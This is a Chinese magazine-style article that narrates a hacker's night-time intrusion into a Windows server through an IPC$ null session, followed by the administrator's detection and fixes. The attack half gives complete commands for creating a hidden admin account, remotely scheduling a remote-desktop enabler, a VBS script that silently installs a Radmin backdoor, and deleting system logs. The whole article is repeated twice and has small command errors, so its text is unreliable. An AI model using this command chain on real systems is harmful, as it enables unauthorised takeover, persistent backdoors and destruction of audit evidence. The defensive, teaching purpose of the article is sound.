论文部分内容阅读
从本文你将学到
√ 黑客常见入侵方式
√ 如何避免空连接漏洞
√ 如何从日志发现木马藏身地
小黑:一个水平中等的“黑客”,曾拜师于一名高手,所以水平有所长进,最近正想找一台机器练手。
小白:刚刚上任不到三天的网管,进入网络安全行业不久,安全水平和发现隐患的意识还需要提高。这次的攻击事件其实并不是黑客水平有多高,而是由于网络安全意识不足,一个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下,上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护,让黑客钻了空子。国内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员,除了给系统打补丁外,还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。
23:25 觅食——入侵检测
晚上11点,某大虾黑客的徒弟小黑打开“IPC$空连接扫描器”,想看看今天是否能中奖找到一台不设防的服务器。时间慢慢的流逝,深夜中传来一声“YEAH!”,哈哈,居然真的还有这么原始漏洞的主机!小黑兴奋地敲击着键盘开始了入侵工作。
小提示:什么是IPC$空连接
IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享),而利用这个空的连接,连接者还可以得到目标主机上的用户列表,从而开始入侵主机。
23:30 挂上诱饵——建立IPC$空连接
小黑打开本地的cmd.exe命令行,输入net use \\202.99.10.*\ipc$ "" /usE:""尝试连接对方服务器,连接成功!输入:net view \\202.99.10.* 发现C$ D$ E$ admin$都默认开启着,原来是台新服务器啊!怪不得,小黑嘴里手上都不清闲。我要完全控制这台服务器!
23:45垂钓——远程控制
IPC$空连接这个漏洞不可能一直存在,先弄个远程管理员好了——屏幕中的命令行下出现了一段命令:
net user xiaohei$ hacker /add
net localgroup administrators xiaohei /add
恩,这样子就拥有了管理名为xiaohei$ 密码为hacker的高级管理员了,以后就可以通过Windows自带的“免杀控制器”:“远程桌面连接”控制服务器了! 来试验一下,打开本地开始菜单→所有程序→附件→通讯→远程桌面连接,在空白地方输入控制服务器的IP地址:202.99.10.*。“是放个木马上去呢还是添加一个FTP账号呢?”小黑脑子中闪现着无数恶毒的后门。正在这时音响中“嘣”的一声,错误提示:无法连接到远程计算机(见图1)!
图1
居然未开启远程服务端口了,难不倒我!继续在命令行下输入: copy C:\3389.exe \\202.99.10.*\admin$ ,将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。
net time \\202.99.10.*,查看远程服务器的系统时间为下面的入侵收集资料,现在时间是凌晨2:10分,at \\202.99.10.* 02:18 3389.exe,利用at命令在远程计算机的2:18分执行3389.exe文件,开启远程控制(需要自动重新启动计算机)。
小提示:远程桌面为什么“免杀”?
远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务,用来连接到开启了远程桌面控制功能的计算机,但是已经被很多黑客用来控制电脑。由于是系统自带服务,也不会受到杀毒软件的查杀。
凌晨2:35上钩——种植木马
为了保险起见,还是再增加一个木马后门程序控制,小黑阴险地笑着祭出了radmin影子版,由于此软件属于管理工具,一般杀毒软件都不对其设防,所以修改后成了最安全的隐形后门。
小黑配制好木马后写了一段VBS代码使木马程序可以自动执行:
set ws=wscript.createobject(“wscript.shell”)
ws.run “regedit.exe /s r_server.reg”,0
ws.run “regedit.exe /s qidong.reg”,0
ws.run “r_server.exe /install /silence”,0
ws.run “r_server.exe /start”,0
将木马程序打包成muma.exe自解压文档,选择运行后自动执行VBS内容,将木马上传到系统盘下,继续利用:at \\202.99.10.* 02:15 muma.exe
凌晨2:40收网——日志清理
对了,得意不能大意,要把操作日志清理了,防止管理员发现主机被动过手脚:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
哈哈,看你还如何逃出我的掌心!!在恶魔的笑声中 202.99.10.*主机沦陷了。
凌晨3:30脱钩——查询服务
正在机房值班网管小白发现今天刚刚安装的WEB服务器(网页服务器)日志少了一段,“有可能被黑客入侵!”
“服务器刚刚安装还没进行安全设置就被强制运行了,没想到这么快就有黑客来入侵,现在的网络真是危险啊!”小白叹了口气,日志没了。看来要手工检测了。在命令行中输入:net start ,察看启动服务(见图2)。居然Terminal Services远程控制服务被开启了,肯定被添加了管理用户。
图2
输入: net user,察看本地所有用户,只有administator、ASPNET、IUSR_TOPJHCN、IWAM_TOPJHCN 几个正常用户,再分别用:
net user administator
net user ASPNET
查看了用户组,一切正常。看来很可能是被建立了隐藏的管理账号了。可以用下面提供的批处理程序察看隐藏账号,代码如下:
@echo off
cd.>netuser.txt
for /f "skip=4 tokens=1-3" %%i in ('net user') do (
if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
if not "%%j"=="" net user %%j>>netuser.txt 2>nul
if not "%%k"=="" net user %%k>>netuser.txt 2>nul
)
start netuser.txt
将以上代码保存为11.bat,执行后会自动将所有登录本地计算机用户的资料保存到netuser.txt中。
★Just Do It:查找隐藏用户的超强批处理
这个专门的批处理可以到http://work.newhua.com/cfan/200717/11.rar下载。下载后查一下自己的电脑中是否有隐藏账户?如果发现了,基本肯定——你已经被“黑”了!
★实例:确认隐藏用户的存在
为了确认存在隐藏用户的存在,在“开始→所有程序→管理工具→计算机管理”,察看本地用户和组中的用户选项,发现多了一个xiaohei$的隐藏用户,且用户在administrators组中,可以确认这个ID是黑客添加的用户了,删除此用户(也可以在命令行下net user xiaohei$ /del删除)。
凌晨3:50解决安全隐患
服务器刚刚上架就有人入侵,看来以后还是要随时管理了,就让远程管理服务开启着吧,不过需要增加一些限制才能放心使用,小白想到一个比较安全的解决方法:
第1步 修改3389登录端口
打开注册表将[HKEY_LOCAL_ MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]路径下的PortNumber默认键值3389修改成一个不常用的端口,如:4432。打开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp],将PortNumber修改成4432。
第2步 在本地“网上邻居→TCP/IP协议→属性→高级→选项→TCP/IP筛选→属性,选择启用“TCP/IP筛选”添加允许通过的端口,如:80 23 4432等相关必要服务(见图3)。
图3
第3步 安装防火墙,限制IP访问4432端口。
小提示:网管别开终端服务
Terminal Services服务(终端服务)在默认安装的Windows 2003服务器上是没有启动的,如果发现服务被启动,一般是被黑客入侵后留下来远程监控的,现在大多数入门级服务器的管理员会开启Terminal Services远程管理服务,推荐管理员使用VNC或者诺顿的PCANYWHERE。
√ 黑客常见入侵方式
√ 如何避免空连接漏洞
√ 如何从日志发现木马藏身地
小黑:一个水平中等的“黑客”,曾拜师于一名高手,所以水平有所长进,最近正想找一台机器练手。
小白:刚刚上任不到三天的网管,进入网络安全行业不久,安全水平和发现隐患的意识还需要提高。这次的攻击事件其实并不是黑客水平有多高,而是由于网络安全意识不足,一个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下,上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护,让黑客钻了空子。国内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员,除了给系统打补丁外,还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。
23:25 觅食——入侵检测
晚上11点,某大虾黑客的徒弟小黑打开“IPC$空连接扫描器”,想看看今天是否能中奖找到一台不设防的服务器。时间慢慢的流逝,深夜中传来一声“YEAH!”,哈哈,居然真的还有这么原始漏洞的主机!小黑兴奋地敲击着键盘开始了入侵工作。
小提示:什么是IPC$空连接
IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享),而利用这个空的连接,连接者还可以得到目标主机上的用户列表,从而开始入侵主机。
23:30 挂上诱饵——建立IPC$空连接
小黑打开本地的cmd.exe命令行,输入net use \\202.99.10.*\ipc$ "" /usE:""尝试连接对方服务器,连接成功!输入:net view \\202.99.10.* 发现C$ D$ E$ admin$都默认开启着,原来是台新服务器啊!怪不得,小黑嘴里手上都不清闲。我要完全控制这台服务器!
23:45垂钓——远程控制
IPC$空连接这个漏洞不可能一直存在,先弄个远程管理员好了——屏幕中的命令行下出现了一段命令:
net user xiaohei$ hacker /add
net localgroup administrators xiaohei /add
恩,这样子就拥有了管理名为xiaohei$ 密码为hacker的高级管理员了,以后就可以通过Windows自带的“免杀控制器”:“远程桌面连接”控制服务器了! 来试验一下,打开本地开始菜单→所有程序→附件→通讯→远程桌面连接,在空白地方输入控制服务器的IP地址:202.99.10.*。“是放个木马上去呢还是添加一个FTP账号呢?”小黑脑子中闪现着无数恶毒的后门。正在这时音响中“嘣”的一声,错误提示:无法连接到远程计算机(见图1)!
图1
居然未开启远程服务端口了,难不倒我!继续在命令行下输入: copy C:\3389.exe \\202.99.10.*\admin$ ,将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。
net time \\202.99.10.*,查看远程服务器的系统时间为下面的入侵收集资料,现在时间是凌晨2:10分,at \\202.99.10.* 02:18 3389.exe,利用at命令在远程计算机的2:18分执行3389.exe文件,开启远程控制(需要自动重新启动计算机)。
小提示:远程桌面为什么“免杀”?
远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务,用来连接到开启了远程桌面控制功能的计算机,但是已经被很多黑客用来控制电脑。由于是系统自带服务,也不会受到杀毒软件的查杀。
凌晨2:35上钩——种植木马
为了保险起见,还是再增加一个木马后门程序控制,小黑阴险地笑着祭出了radmin影子版,由于此软件属于管理工具,一般杀毒软件都不对其设防,所以修改后成了最安全的隐形后门。
小黑配制好木马后写了一段VBS代码使木马程序可以自动执行:
set ws=wscript.createobject(“wscript.shell”)
ws.run “regedit.exe /s r_server.reg”,0
ws.run “regedit.exe /s qidong.reg”,0
ws.run “r_server.exe /install /silence”,0
ws.run “r_server.exe /start”,0
将木马程序打包成muma.exe自解压文档,选择运行后自动执行VBS内容,将木马上传到系统盘下,继续利用:at \\202.99.10.* 02:15 muma.exe
凌晨2:40收网——日志清理
对了,得意不能大意,要把操作日志清理了,防止管理员发现主机被动过手脚:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
哈哈,看你还如何逃出我的掌心!!在恶魔的笑声中 202.99.10.*主机沦陷了。
凌晨3:30脱钩——查询服务
正在机房值班网管小白发现今天刚刚安装的WEB服务器(网页服务器)日志少了一段,“有可能被黑客入侵!”
“服务器刚刚安装还没进行安全设置就被强制运行了,没想到这么快就有黑客来入侵,现在的网络真是危险啊!”小白叹了口气,日志没了。看来要手工检测了。在命令行中输入:net start ,察看启动服务(见图2)。居然Terminal Services远程控制服务被开启了,肯定被添加了管理用户。
图2
输入: net user,察看本地所有用户,只有administator、ASPNET、IUSR_TOPJHCN、IWAM_TOPJHCN 几个正常用户,再分别用:
net user administator
net user ASPNET
查看了用户组,一切正常。看来很可能是被建立了隐藏的管理账号了。可以用下面提供的批处理程序察看隐藏账号,代码如下:
@echo off
cd.>netuser.txt
for /f "skip=4 tokens=1-3" %%i in ('net user') do (
if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
if not "%%j"=="" net user %%j>>netuser.txt 2>nul
if not "%%k"=="" net user %%k>>netuser.txt 2>nul
)
start netuser.txt
将以上代码保存为11.bat,执行后会自动将所有登录本地计算机用户的资料保存到netuser.txt中。
★Just Do It:查找隐藏用户的超强批处理
这个专门的批处理可以到http://work.newhua.com/cfan/200717/11.rar下载。下载后查一下自己的电脑中是否有隐藏账户?如果发现了,基本肯定——你已经被“黑”了!
★实例:确认隐藏用户的存在
为了确认存在隐藏用户的存在,在“开始→所有程序→管理工具→计算机管理”,察看本地用户和组中的用户选项,发现多了一个xiaohei$的隐藏用户,且用户在administrators组中,可以确认这个ID是黑客添加的用户了,删除此用户(也可以在命令行下net user xiaohei$ /del删除)。
凌晨3:50解决安全隐患
服务器刚刚上架就有人入侵,看来以后还是要随时管理了,就让远程管理服务开启着吧,不过需要增加一些限制才能放心使用,小白想到一个比较安全的解决方法:
第1步 修改3389登录端口
打开注册表将[HKEY_LOCAL_ MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]路径下的PortNumber默认键值3389修改成一个不常用的端口,如:4432。打开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp],将PortNumber修改成4432。
第2步 在本地“网上邻居→TCP/IP协议→属性→高级→选项→TCP/IP筛选→属性,选择启用“TCP/IP筛选”添加允许通过的端口,如:80 23 4432等相关必要服务(见图3)。
图3
第3步 安装防火墙,限制IP访问4432端口。
小提示:网管别开终端服务
Terminal Services服务(终端服务)在默认安装的Windows 2003服务器上是没有启动的,如果发现服务被启动,一般是被黑客入侵后留下来远程监控的,现在大多数入门级服务器的管理员会开启Terminal Services远程管理服务,推荐管理员使用VNC或者诺顿的PCANYWHERE。